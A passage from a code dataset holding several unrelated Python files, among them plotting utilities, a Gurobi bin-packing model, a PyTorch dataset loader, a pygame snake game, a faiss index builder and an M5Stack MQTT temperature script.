ax.plot(hl, np.zeros(shape=(len(hl),)), color='gray', ls='--')\n ax.set_xlabel('Predicted revenue in million')\n ax.set_ylabel('Residual (ground truth - predicted) in million')\n ax.set_title('Residuals v.s. Predicted revenue')\n\n\n\ndef pl_residual_hist(gt, preds,):\n \"\"\" Plot the frequency-dependent residuals\n\n Parameters\n ----------\n freq_indexx : int, [0,33);\n the index of a frequency axis\n \"\"\"\n\n fig, axe = plt.subplots()\n residual = gt - np.squeeze(preds)\n\n # histogram\n axe = sns.histplot(data=residual, bins=10, binrange=(-1, 1), kde=False, stat='density')\n \n # KDE plot\n # sns.kdeplot(data=data_per_freq, color='crimson', ax=axe)\n\n mean = np.mean(residual)\n sigma = np.std(residual)\n\n # fitted Gaussian with MLE paramters\n N = tfp.distributions.Normal(loc=mean, scale=sigma)\n x_axis = np.linspace(-1, 1, 100)\n pdf = N.prob(x_axis)\n\n axe.plot(x_axis, pdf, color='crimson', linestyle='--')\n # adding such infor in the plot but very hard to control the location dynamically\n # axe.text(0.8, 1., f\"mu={mean:.2f}\")\n # axe.text(0.8, 1.2, f\"std={sigma:.2f}\")\n\n axe.set_xlabel('Residual')\n axe.set_title('Residual distribution (training set)')","repo_name":"leslieDLcy/KTP_Croud","sub_path":"src/modelling/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41260985127","text":"#!/usr/bin/python3\n\n'''\nThis example shows how to shuffle a list in python\n'''\n\nimport random # for seed, shuffle\n# for deterministic behaviour\nrandom.seed(7)\nl = list(range(1, 10))\nrandom.shuffle(l)\nprint(l)\n","repo_name":"nonZero/demos-python","sub_path":"src/examples/short/random/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21178332826","text":"\r\nfrom gurobipy import *\r\n\r\ndef threestep(name):\r\n import numpy as np\r\n from readdata import data\r\n import math\r\n\r\n data = data(name)\r\n\r\n w = data[1]\r\n c = data[2]\r\n C = data[0]\r\n N = len(w)\r\n UB = data[3]\r\n\r\n data = []\r\n for j in range(len(w)):\r\n data.append([j,c[j],w[j]])\r\n\r\n\r\n Colors = []\r\n for i in c:\r\n if i not in Colors:\r\n Colors.append(i)\r\n\r\n colj = []\r\n for i in Colors:\r\n colr = []\r\n for j in data:\r\n if i == j[1]:\r\n colr.append(j[0])\r\n colj.append(colr)\r\n\r\n\r\n Lc1 = []\r\n for i in Colors:\r\n v = 0\r\n for j in data:\r\n if j[1] == i:\r\n v += j[2]\r\n Lc1.append(math.ceil(v/C))\r\n\r\n Ic1 = []\r\n for i in Colors:\r\n c1 = []\r\n for j in data:\r\n if j[1] == i:\r\n for k in range(C//2):\r\n if j[2] > C-k:\r\n c1.append(j[0])\r\n break \r\n Ic1.append(c1)\r\n\r\n Ic2 = []\r\n for i in Colors:\r\n c2 = []\r\n for j in data:\r\n if j[1] == i:\r\n for k in range(C//2):\r\n if C-k >= j[2] and j[2] > C/2 :\r\n c2.append(j[0])\r\n if j[0] in Ic1:\r\n print(\"stoooppp\")\r\n break\r\n \r\n Ic2.append(c2)\r\n\r\n Ic3 = []\r\n for i in Colors:\r\n c3 = []\r\n for j in data:\r\n if j[1] == i:\r\n for k in range(C//2):\r\n if C/2 >= j[2] and j[2] >= k :\r\n c3.append(j[0])\r\n if j[0] in Ic1 or j[0] in Ic2:\r\n print(\"stoooppp\")\r\n break \r\n Ic3.append(c3)\r\n\r\n Lc2 = []\r\n for i in range(len(Colors)):\r\n lc2 = 0\r\n a = 0\r\n for j in Ic3[i]:\r\n\r\n a += data[j][2]/C\r\n b = 0 \r\n for k in Ic2[i]:\r\n b += data[j][2]/C\r\n if math.ceil(a-len(Ic2[i])+b)>0:\r\n lc2 += math.ceil(a-len(Ic2[i])+b)\r\n lc2 += len(Ic1[i])+len(Ic2[i])\r\n Lc2.append(lc2)\r\n\r\n Lc = []\r\n for i in range(len(Colors)):\r\n Lc.append(max(Lc1[i],Lc2[i]))\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n M = len(Colors)\r\n\r\n\r\n stepone_model = Model(\"BPP\")\r\n\r\n #t = []\r\n #for i in range(N):\r\n #for j in range(i+1):\r\n # if j< UB:\r\n # t.append((j,i))\r\n \r\n\r\n t = []\r\n for i in range(N):\r\n for j in range(UB):\r\n t.append((j,i)) \r\n\r\n l = tuplelist(t)\r\n\r\n\r\n x = stepone_model.addVars(l,vtype= GRB.BINARY, name = \"x\" )\r\n y = stepone_model.addVars(UB,M, vtype= GRB.BINARY, name = \"y\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n for i in range(N):\r\n I = []\r\n for k in l:\r\n if k[1] == i:\r\n I.append(k[0])\r\n stepone_model.addConstr(quicksum(x[q,i] for q in I) == 1)\r\n\r\n for j in range(UB):\r\n I = []\r\n for k in l:\r\n if k[0] == j:\r\n I.append(k[1])\r\n\r\n stepone_model.addConstr(quicksum(x[j,i]*w[i] for i in I) <= C )\r\n\r\n\r\n for j in range(len(Colors)):\r\n for k in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == k:\r\n I.append(q[1])\r\n\r\n for i in I:\r\n if data[i][1] == Colors[j]:\r\n stepone_model.addConstr(x[k,i] <= y[k,j])\r\n\r\n for k in range(len(Colors)):\r\n for j in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == j and q[1] in colj[k]:\r\n I.append(q[1])\r\n stepone_model.addConstr((quicksum(x[j,i] for i in I ) <= y[j,k]*C ))\r\n\r\n for j in range(len(Colors)):\r\n stepone_model.addConstr(quicksum(y[i,j] for i in range(UB)) >= Lc[j])\r\n\r\n\r\n\r\n Obj = quicksum(y[i,j] for j in range(M) for i in range(UB))\r\n\r\n\r\n stepone_model.setObjective(Obj,GRB.MINIMIZE) \r\n\r\n\r\n stepone_model.setParam('TimeLimit', 60)\r\n stepone_model.optimize()\r\n\r\n mcf = int(stepone_model.objVal)\r\n\r\n startsol = []\r\n for i in t:\r\n startsol.append([i,x[i[0],i[1]].x])\r\n\r\n\r\n #for v in stepone_model.getVars():\r\n # print(\"%s : %g\" %(v.varName,v.x))\r\n\r\n\r\n BPP_model = Model(\"BPP\")\r\n\r\n\r\n Q = []\r\n\r\n for i in Colors:\r\n q = 0\r\n for j in range(len(c)):\r\n if c[j] == i:\r\n q += w[j]\r\n Q.append(q)\r\n\r\n\r\n duplicates = []\r\n W = []\r\n for i in Q:\r\n if i not in duplicates:\r\n W.append([i,1])\r\n duplicates.append(i)\r\n else:\r\n for j in range(len(W)):\r\n if W[j][0] == i:\r\n W[j][1] += 1\r\n\r\n if 1 not in duplicates:\r\n duplicates.append(1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n u = BPP_model.addVars(UB, vtype= GRB.BINARY, name = \"u\" )\r\n x = BPP_model.addVars(M,UB, vtype= GRB.CONTINUOUS, name = \"x\", lb=0,ub=1 )\r\n z = BPP_model.addVars(M,UB, vtype= GRB.BINARY, name = \"z\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n for i in range(M):\r\n BPP_model.addConstr(quicksum(x[i,j] for j in range(UB)) == 1)\r\n\r\n BPP_model.addConstrs(quicksum(x[i,j]*Q[i] for i in range(M)) <= C*u[j] for j in range(UB))\r\n\r\n BPP_model.addConstr(quicksum(z[i,j] for i in range(M) for j in range(UB))-M <= mcf )\r\n\r\n for k in range(UB):\r\n for i in range(M):\r\n BPP_model.addConstr(x[i,k] <= z[i,k])\r\n \r\n\r\n\r\n Obj = quicksum(u[i] for i in range(UB))\r\n\r\n BPP_model.setObjective(Obj,GRB.MINIMIZE) \r\n\r\n\r\n BPP_model.optimize()\r\n\r\n Bins = BPP_model.objVal\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n steptwo_model = Model(\"BPP\")\r\n\r\n #t = []\r\n #for i in range(N):\r\n #for j in range(i+1):\r\n # if j< UB:\r\n # t.append((j,i))\r\n \r\n\r\n\r\n #l = tuplelist(t)\r\n\r\n x = steptwo_model.addVars(l,vtype= GRB.BINARY, name = \"x\" )\r\n #.GetVarByName()\r\n for i in range(len(t)):\r\n x[t[i][0],t[i][1]].start = startsol[i][1]\r\n\r\n\r\n\r\n y = steptwo_model.addVars(UB,M, vtype= GRB.BINARY, name = \"y\")\r\n z = steptwo_model.addVars(UB, vtype= GRB.BINARY, name = \"z\")\r\n\r\n\r\n\r\n steptwo_model.addConstr(quicksum(y[i,j] for j in range(M) for i in range(UB)) <= mcf)\r\n\r\n for i in range(N):\r\n I = []\r\n for k in l:\r\n if k[1] == i:\r\n I.append(k[0])\r\n steptwo_model.addConstr(quicksum(x[q,i] for q in I) == 1)\r\n\r\n for j in range(UB):\r\n I = []\r\n for k in l:\r\n if k[0] == j:\r\n I.append(k[1])\r\n\r\n steptwo_model.addConstr(quicksum(x[j,i]*w[i] for i in I) <= C*z[j] )\r\n\r\n\r\n for j in range(len(Colors)):\r\n for k in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == k:\r\n I.append(q[1])\r\n\r\n for i in I:\r\n if data[i][1] == Colors[j]:\r\n steptwo_model.addConstr(x[k,i] <= y[k,j])\r\n\r\n for k in range(len(Colors)):\r\n for j in range(UB):\r\n I = []\r\n for q in l:\r\n if q[0] == j and q[1] in colj[k]:\r\n I.append(q[1])\r\n steptwo_model.addConstr((quicksum(x[j,i] for i in I ) <= y[j,k]*C ))\r\n\r\n\r\n for j in range(len(Colors)):\r\n steptwo_model.addConstr(quicksum(y[i,j] for i in range(UB)) >= Lc[j])\r\n\r\n #for i in range(UB-1):\r\n #steptwo_model.addConstr(z[i] >= z[i+1] )\r\n\r\n steptwo_model.addConstr(quicksum(z[i] for i in range(UB)) >= Bins)\r\n\r\n Obj = quicksum(z[i] for i in range(UB))\r\n\r\n steptwo_model.setObjective(Obj,GRB.MINIMIZE) \r\n\r\n steptwo_model.setParam('TimeLimit', 300)\r\n steptwo_model.optimize()\r\n\r\n print(\"Objective function value: %f\" %steptwo_model.objVal)\r\n for v in steptwo_model.getVars():\r\n print(\"%s : %g\" %(v.varName,v.x))\r\n\r\n X = []\r\n for var in steptwo_model.getVars():\r\n if \"x\" in var.VarName:\r\n if var.xn > 0:\r\n X.append(['%s %g' %(var.varName, var.xn)])\r\n\r\n\r\n used_bins = []\r\n for i in X:\r\n for j in i:\r\n j = j.split(\"[\")\r\n j = j[1].split(\",\")\r\n if j[0] not in used_bins:\r\n used_bins.append(j[0])\r\n\r\n Y = 0\r\n\r\n for var in steptwo_model.getVars():\r\n if \"y\" in var.VarName:\r\n Y += var.xn\r\n\r\n\r\n\r\n\r\n MCF = Y \r\n runtime = steptwo_model.Runtime\r\n BPP = len(used_bins)\r\n print(\"Bins used: %f\" %BPP)\r\n print(\"Objective function value: %f\" % steptwo_model.objVal)\r\n print(\"Minimum Color Fragmentation: %f\" %MCF)\r\n print(\"Runtime is: %f\" %runtime)\r\n return [runtime,MCF,BPP]\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MBBossenbroek/BPPMCF","sub_path":"code/Item_symmetry.py","file_name":"Item_symmetry.py","file_ext":"py","file_size_in_byte":8690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36047530922","text":"from flask import Flask\nfrom app.routes import init_routes\nimport config\n\n\ndef create_app() -> Flask:\n app = Flask(__name__,\n static_folder=config.STATIC_FOLDER,\n template_folder=config.TEMPLATE_FOLDER)\n app.config.from_object(config)\n init_routes(app)\n\n return app\n","repo_name":"wvw321/web-manga-translation","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14190377163","text":"import torch\nfrom torch.utils.data import Dataset\nfrom mol_featurizer import *\nfrom word2vec import seq_to_kmers, get_protein_embedding\nfrom gensim.models import Word2Vec\nimport json\nimport random\n\ndef load_data_map(smiles_mapping_path, protein_seq_mapping_path, chembl_uniprot_mapping_path):\n # Load mappings...\n # Load SMILES mapping\n smiles_mapping = {}\n # if the file is tsv, use the following code\n if smiles_mapping_path.endswith(\".tsv\"):\n with open(smiles_mapping_path, \"r\") as f:\n for line in f:\n _,chembl_id, smiles = line.strip().split('\\t')\n smiles_mapping[chembl_id] = smiles\n else:\n # if the file is json, use the following code\n with open(smiles_mapping_path, \"r\") as f:\n smiles_mapping = json.load(f)\n # Load protein sequence mapping \n with open(protein_seq_mapping_path, \"r\") as f:\n protein_seq_mapping = json.load(f)\n\n # Load Chembl to Uniprot mapping\n with open(chembl_uniprot_mapping_path, \"r\") as f:\n chembl_uniprot_mapping = json.load(f)\n \n return smiles_mapping, protein_seq_mapping, chembl_uniprot_mapping\n\n\nclass ProteinCompoundDataset(Dataset):\n def __init__(self, data, smiles_mapping, protein_seq_mapping, chembl_uniprot_mapping, unlabeled=False):\n self.data = data\n self.smiles_mapping = smiles_mapping\n self.protein_seq_mapping = protein_seq_mapping\n self.chembl_uniprot_mapping = chembl_uniprot_mapping\n self.word_model = Word2Vec.load(\"/raid/home/yoyowu/TransformerCPI/GPCR/word2vec_30.model\")\n self.unlabeled = unlabeled\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n if self.unlabeled:\n compound_id, uniprot_id = self.data[idx]\n else:\n compound_id, uniprot_id, label = self.data[idx]\n # convert label to float if it is string \n if isinstance(label, str):\n label = float(label)\n \n smiles = self.smiles_mapping.get(compound_id, None)\n \n chembl_id_for_protein = next((k for k, v in self.chembl_uniprot_mapping.items() if v == uniprot_id), None)\n\n protein_seq = self.protein_seq_mapping.get(chembl_id_for_protein, None)\n if protein_seq is not None:\n protein_embedding = torch.tensor(get_protein_embedding(self.word_model, seq_to_kmers(protein_seq)))\n else:\n protein_embedding = None\n \n if smiles is None or protein_seq is None or chembl_id_for_protein is None:\n # Handle missing data\n return None\n \n atom_feature, adj = mol_features(smiles)\n if self.unlabeled:\n return torch.tensor(atom_feature), torch.tensor(adj), protein_embedding\n else:\n return torch.tensor(atom_feature), torch.tensor(adj), protein_embedding, torch.tensor(int(label))\n\n\n\ndef pack(atoms, adjs, proteins, labels):\n atoms_len = 0\n proteins_len = 0\n\n N = len(atoms)\n\n atom_num = torch.zeros((N, 1))\n i = 0\n for atom in atoms:\n atom_num[i] = atom.shape[0]\n i += 1\n if atom.shape[0] >= atoms_len:\n atoms_len = atom.shape[0]\n\n protein_num = torch.zeros((N, 1))\n i = 0\n for protein in proteins:\n protein_num[i] = protein.shape[0]\n i += 1\n if protein.shape[0] >= proteins_len:\n proteins_len = protein.shape[0]\n\n atoms_new = torch.zeros((N, atoms_len, 34))\n i = 0\n for atom in atoms:\n a_len = atom.shape[0]\n atoms_new[i, :a_len, :] = atom\n i += 1\n\n adjs_new = torch.zeros((N, atoms_len, atoms_len))\n i = 0\n for adj in adjs:\n a_len = adj.shape[0]\n adj = adj + torch.eye(a_len)\n adjs_new[i, :a_len, :a_len] = adj\n i += 1\n\n proteins_new = torch.zeros((N, proteins_len, 100))\n i = 0\n for protein in proteins:\n a_len = protein.shape[0]\n proteins_new[i, :a_len, :] = protein\n i += 1\n\n labels_new = torch.zeros(N)\n i = 0\n for label in labels:\n labels_new[i] = label\n i += 1\n return atoms_new, adjs_new, proteins_new, labels_new, atom_num, protein_num\n\n\ndef collate_fn(batch):\n \"\"\"\n Args batch: list of data, each atom, adj, protein, label = data\n \"\"\"\n atoms, adjs, proteins, labels = zip(*batch)\n return pack(atoms, adjs, proteins, labels)\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)","repo_name":"AdorableYoyo/TransformerCPI","sub_path":"GPCR/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73318253172","text":"import computed_property\n\nclass Circle:\n def __init__(self, radius=1):\n self.radius = radius\n\n @computed_property('radius', 'area')\n def diameter(self):\n \"\"\"Circle diameter from radius\"\"\"\n print(\"Calculating diameter\")\n return self.radius * 2\n \n @diameter.setter\n def diameter(self, diameter):\n self.radius = diameter / 2\n \n @diameter.deleter\n def diameter(self):\n self.radius = 0\n\ncircle = Circle()\nprint(circle.diameter)\nprint(circle.diameter)\ncircle.diameter = 3\nprint(circle.radius)\ndel circle.diameter\nprint(circle.radius)\nhelp(Circle)\n","repo_name":"juan-faria/bwgi-computed-property","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"837989194","text":"from Models.regressor import Regressor\nfrom Models.darknet19 import Darknet19\nfrom Models.mobilenetv2 import MobileNetV2\nimport torch\nimport torch.nn as nn\nimport sys\n\n\nnet_cfgs = [\n # conv1s\n [(32, 3)],\n ['M', (64, 3)],\n ['M', (128, 3), (64, 1), (128, 3)],\n ['M', (256, 3), (128, 1), (256, 3)],\n ['M', (512, 3), (256, 1), (512, 3), (256, 1), (512, 3)],\n # conv2\n ['M', (1024, 3), (512, 1), (1024, 3), (512, 1), (1024, 3)],\n # ------------\n # conv3\n #[(1024, 3), (1024, 3)],\n # conv4\n #[(1024, 3)],\n [(1280,1)]\n ]\n\n\"\"\"\n _summary_ = Lidar CNN model for pose estimation\n\n Returns:\n Tensor: concatenated output of translation and rotation\n\"\"\"\nclass LidarCNN(nn.Module):\n def __init__(self,in_channels=6, translation = 3, rotation = 3):\n super(LidarCNN,self).__init__()\n self.featureNet = self.create_darknet19_features()\n \n # self.translationNet = Regressor(\n # in_channels=1280,\n # out_channels=2*translation,\n # )\n \n # self.rotationNet = Regressor(\n # in_channels=1280,\n # out_channels=2*rotation,\n # )\n \n self.init_weights()\n \n def create_darknet19_features(self):\n features = []\n in_channels = 6\n for _,layers in enumerate(net_cfgs):\n for layer in layers:\n if layer == 'M':\n features.append(nn.MaxPool1d(kernel_size=2,stride=2))\n else:\n out_channels,kernel_size = layer\n if kernel_size == 1:\n features.append(nn.Conv1d(in_channels,out_channels,kernel_size,1))\n else:\n features.append(nn.Conv1d(in_channels,out_channels,kernel_size,1,1))\n features.append(nn.BatchNorm1d(out_channels))\n features.append(nn.LeakyReLU(0.1))\n in_channels = out_channels\n features.append(nn.AdaptiveAvgPool1d((1)))\n return nn.Sequential(*features) \n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm1d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n \n def forward(self,x):\n # self.ft = self.featureNet(x).view(x.size(0),-1)\n # translation = self.translationNet(self.ft)\n # rotation = self.rotationNet(self.ft)\n \n # return torch.cat((translation, rotation), dim=1)\n return self.featureNet(x).view(x.size(0),-1)\n \nif __name__ == '__main__':\n model = LidarCNN()\n x=torch.randn(4,6,13000)\n print(model(x).shape)\n \n ","repo_name":"bilalkah/MachineLearning","sub_path":"biloCNN/extra/LidarCNN.py","file_name":"LidarCNN.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41354161166","text":"from ast import parse\nfrom operator import index\nimport os\nfrom random import sample, seed\nimport faiss\nimport math\nfrom basicts.runners.data_store import DataStore\nimport numpy as np\nimport time\nimport argparse\n\n\nclass IndexBuilder:\n\n def __init__(self, dstore_dir, used_hidden=\"hiddens\", use_gpu=False, metric=\"l2\", suffix=\"\"):\n\n self.dstore_dir = dstore_dir\n self.dstore = DataStore.from_pretrained(dstore_dir=dstore_dir, used_hidden=used_hidden, mode=\"r\", subset=\"train\")\n self.use_gpu = use_gpu\n self.metric = metric\n self.suffix =suffix\n self.used_hidden = used_hidden\n\n def exists(self):\n return os.path.exists(self.trained_file) and os.path.exists(self.faiss_file)\n\n @property\n def trained_file(self):\n file_path = os.path.join(self.dstore_dir, \"faiss_store.trained.{}.{}{}\".format(self.used_hidden, self.metric, self.suffix))\n return file_path\n\n @property\n def faiss_file(self):\n file_path = os.path.join(self.dstore_dir, \"faiss_store.{}.{}{}\".format(self.used_hidden, self.metric, self.suffix))\n return file_path\n\n def get_auto_index_type(self):\n \"\"\"we choose index type by https://github.com/facebookresearch/faiss/wiki/Guidelines-to-choose-an-index\"\"\"\n dstore_size = self.dstore.dstore_size\n if dstore_size < 3000:\n return \"IDMap,,Flat\"\n clusters = min(int(4 * math.sqrt(dstore_size)), dstore_size // 30, 131072)\n if dstore_size < 30000:\n return \"IDMap,,Flat\"\n if dstore_size < 10 ** 6:\n return f\"OPQ32_{self.dstore.hidden_size},IVF{clusters},PQ32\" # we use 64 here since faiss does not support >64 in gpu mode\n return f\"OPQ32_{self.dstore.hidden_size},IVF{clusters}_HNSW32,PQ32\"\n\n def build(self, index_type, chunk_size=1000000, seed=None, start=0, overwrite=False):\n if index_type == \"auto\":\n index_type = self.get_auto_index_type()\n\n self.train(index_type=index_type, max_num=chunk_size, seed=seed, overwrite=overwrite)\n print(\"Adding Keys.\")\n pretrained_file = self.trained_file\n\n if os.path.exists(self.faiss_file) and not overwrite:\n pretrained_file = self.faiss_file\n print(\"faiss index file exists, use it as pretrain index\")\n\n index = faiss.read_index(pretrained_file)\n if pretrained_file == self.faiss_file:\n start = index.ntotal\n print(\"start from {} lines, due to pretrained faiss file: {}\".format(start, self.faiss_file))\n dstore_size = self.dstore.dstore_size\n start_time = time.time()\n while start < dstore_size:\n end = min(dstore_size, start + chunk_size)\n to_add = np.array(self.dstore.keys[start:end])\n if self.metric == \"cosine\":\n norm = np.sqrt(np.sum(to_add ** 2, axis=-1, keepdims=True))\n if (norm == 0).any():\n print(f\"found zero norm vector in {self.dstore.dstore_dir}\")\n norm = norm + 1e-10\n to_add = to_add / norm\n index.add(to_add.astype(np.float32))\n start = end\n\n print(\"Add {} tokens so far\".format(index.ntotal))\n faiss.write_index(index, self.faiss_file)\n print(\"Adding total {} keys.\".format(index.ntotal))\n print(\"Adding took {} s\".format(time.time() - start_time))\n print(\"Writing Index\")\n start = time.time()\n faiss.write_index(index, self.faiss_file)\n print(\"Writing index took {} s\".format(time.time() - start_time))\n print(\"Wrote data to {}\".format(self.faiss_file))\n\n\n def train(self, index_type, max_num=None, seed=None, overwrite=False):\n hidden_size, dstore_size = self.dstore.hidden_size, self.dstore.dstore_size\n if os.path.exists(self.trained_file) and not overwrite:\n print(\"trained file already existes. Us existing file: {}\".format(self.trained_file))\n return\n\n metric = faiss.METRIC_L2 if self.metric == \"l2\" else faiss.METRIC_INNER_PRODUCT\n index = faiss.index_factory(hidden_size, index_type, metric)\n\n if self.use_gpu:\n print(\"Using gpu for training\")\n res = faiss.StandardGpuResources()\n co = faiss.GpuClonerOptions()\n\n index = faiss.index_cpu_to_gpu(res, 0, index, co)\n\n if self.dstore.dstore_size < max_num:\n sample_keys = np.array(self.dstore.keys.astype(np.float32))\n else:\n np.random.seed(seed)\n max_num = max_num or self.dstore.dstore_size\n sample_keys = np.array(self.dstore.keys[-max_num:].astype(np.float32))\n if self.metric == \"cosine\":\n norm = np.sqrt(np.sum(sample_keys ** 2, axis=-1, keepdims=True))\n if (norm == 0).any():\n print(\"find zero norm vector in {}\".format(self.dstore.dstore_dir))\n norm = norm + 1e-10\n sample_keys = sample_keys / norm\n\n start = time.time()\n print(\"Training Index\")\n index.verbose = True\n index.train(sample_keys)\n print(\"Training took {} s\".format(time.time() - start))\n if self.use_gpu:\n index = faiss.index_gpu_to_cpu(index)\n print(\"Writing index after training\")\n\n start = time.time()\n faiss.write_index(index, self.trained_file)\n print(\"Writing index took {} s\".format(time.time() - start))\n\n\ndef build(dstore_dir, used_hidden=\"tsformer\", index_type=\"auto\", use_gpu=False, metric=\"l2\", suffix=\"\", overwrite=False, seed=None, chunk_size=1000000):\n index_buider = IndexBuilder(dstore_dir=dstore_dir, use_gpu=use_gpu, metric=metric, suffix=suffix)\n if overwrite or not index_buider.exists():\n index_buider.build(index_type=index_type, seed=seed, chunk_size=chunk_size, overwrite=overwrite)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--index_type\", default=\"auto\", type=str)\n parser.add_argument(\"--use_gpu\", default=True, action='store_true')\n parser.add_argument('--metric', type=str, default=\"l2\", choices=[\"l2\", \"ip\", \"cosine\"],\n help='faiss index metric, l2 for L2 distance, ip for inner product, '\n 'cosine for cosine similarity')\n parser.add_argument(\"--suffix\", default=\"\", type=str)\n parser.add_argument('--chunk_size', default=1000000, type=int,\n help='can only load a certain amount of data to memory at a time.')\n parser.add_argument('--seed', type=int, default=123, help='random seed')\n parser.add_argument(\"--overwrite\", action=\"store_true\", default=False,\n help=\"if True, delete old faiss_store files before generating new ones\")\n parser.add_argument(\"--dstore_dir\", type=str, default=\"./data_store\", help=\"paths to data store. if provided multiple,\"\n \"use ',' as separator\")\n parser.add_argument(\"--used_hidden\", default=\"tsformer\", type=str)\n args = parser.parse_args()\n build(args.dstore_dir, used_hidden=args.used_hidden, index_type=args.index_type, use_gpu=args.use_gpu, seed=args.seed,\n metric=args.metric, suffix=args.suffix, overwrite=args.overwrite, chunk_size=args.chunk_size)\n\n\n\n","repo_name":"hlhang9527/KNN-MTS","sub_path":"basicts/runners/index_builder.py","file_name":"index_builder.py","file_ext":"py","file_size_in_byte":6841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73963854773","text":"import pygame\nimport src.constants as const\n\n\nclass Snake(pygame.sprite.Sprite):\n\n def __init__(self, head_img, tail_img):\n pygame.sprite.Sprite.__init__(self)\n self.snake_head_img = head_img\n self.snake_tail_img = tail_img\n self.image = pygame.transform.scale(self.snake_head_img, (const.PIECE_SIZE, const.PIECE_SIZE))\n self.rect = self.image.get_rect()\n self.rect.center = [const.WIDTH / 2, const.HEIGHT / 2]\n self.pieces = []\n self.length = 1\n self.speedx = 0\n self.speedy = 0\n self.score = 0\n self.direction = None\n\n def update(self):\n keystate = pygame.key.get_pressed()\n if keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedx = -const.SPEED\n self.speedy = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 90)\n self.direction = \"L\"\n elif keystate[pygame.K_RIGHT] or keystate[pygame.K_d]:\n self.speedx = const.SPEED\n self.speedy = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 270)\n self.direction = \"R\"\n elif keystate[pygame.K_UP] or keystate[pygame.K_w]:\n self.speedy = -const.SPEED\n self.speedx = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 360)\n self.direction = \"U\"\n elif keystate[pygame.K_DOWN] or keystate[pygame.K_s]:\n self.speedy = const.SPEED\n self.speedx = 0\n self.image = pygame.transform.rotate(self.snake_head_img, 180)\n self.direction = \"D\"\n\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n\n def draw(self, window):\n for i in self.pieces[:-2]:\n if self.direction == \"L\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 270), [i[0], i[1]])\n if self.direction == \"R\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 90), [i[0], i[1]])\n if self.direction == \"U\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 180), [i[0], i[1]])\n if self.direction == \"D\":\n window.blit(pygame.transform.rotate(self.snake_tail_img, 360), [i[0], i[1]])\n\n def collision(self, col_type):\n if col_type == 'score':\n self.length += const.APPLE_LENGTH\n self.score += const.APPLE_SCORE\n const.FPS += const.APPLE_SPEED\n elif col_type == 'acc':\n self.score += const.ICECREAM_SCORE\n const.FPS += const.ICECREAM_SPEED\n else:\n self.score = max(0, self.score + const.PIZZA_SCORE)\n const.FPS = max(const.DEFAULT_FPS, const.FPS + const.PIZZA_SPEED)\n\n def boarder_collisions(self):\n if self.rect.right > const.WIDTH or self.rect.left < 0 or self.rect.top < 0 or self.rect.bottom > const.HEIGHT:\n return True\n return False\n","repo_name":"lavalxl/Python-Projects","sub_path":"snake_game/src/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35509856585","text":"import os, sys, io\nimport M5\nfrom M5 import *\nfrom hardware import *\nfrom umqtt import *\nimport time\nfrom unit import *\n\n\ni2c0 = None\nmqtt_client = None\nenv3_0 = None\n\n\ntemp = None\nmsg = None\nroom = None\n\n\ndef setup():\n global i2c0, mqtt_client, env3_0, temp, msg, room\n\n i2c0 = I2C(0, scl=Pin(1), sda=Pin(2), freq=100000)\n env3_0 = ENV(i2c=i2c0, type=3)\n M5.begin()\n mqtt_client = MQTTClient('hellom5', 'm5server.local', port=1883, user='atom1', password='test4375', keepalive=300)\n mqtt_client.connect(clean_session=True)\n room = ' office'\n\n\ndef loop():\n global i2c0, mqtt_client, env3_0, temp, msg, room\n temp = env3_0.read_temperature()\n temp = temp * 1.8\n temp = temp + 32\n msg = (str(temp)) + room\n mqtt_client.publish('temp', msg, qos=0)\n time.sleep(2)\n\n\nif __name__ == '__main__':\n 